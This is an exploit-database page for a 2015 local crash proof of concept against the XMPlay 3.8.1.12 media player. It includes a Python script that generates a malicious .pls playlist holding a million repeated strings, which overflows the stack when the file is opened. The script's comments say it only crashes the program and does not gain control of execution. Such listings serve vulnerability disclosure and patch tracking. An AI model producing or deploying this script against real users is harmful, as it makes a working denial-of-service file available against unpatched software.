header-logo
Suggest Exploit
vendor:
XMPlay
by:
St0rn
7.8
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: XMPlay
Affected Version From: 3.8.1.12
Affected Version To: 3.8.1.12
Patch Exists: YES
Related CWE: N/A
CPE: a:un4seen_developments:xmplay
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2015

XMPlay .pls Local Crash poc

This exploit is a proof of concept for a local crash in XMPlay. It creates a .pls file with a large number of 'pwned' characters, which causes a stack overflow when the file is opened in XMPlay.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#
# Exploit Title: XMPlay .pls Local Crash poc
# Date: 2015-08-16
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: http://www.un4seen.com/
# Software Link:   http://www.un4seen.com/download.php?xmplay38
# Version: 3.8.1.12
# Tested on: Windows 7
#


# Stack Overflowing xmplay, but we can't 
# rewrite any register ou SE Handler

def generateCrash():
 crash="""[playlist]
numberofentries=1
file1="""

 crash+="pwned"*1000000
 return crash



try:
 f=open("xmplay.pls","w")
 f.write(generateCrash())
 f.close
 print "Evil xmplay.pls generated!"
except:
 print "I can't create file :/"

Navigation

Suggest Exploit

Services By CQR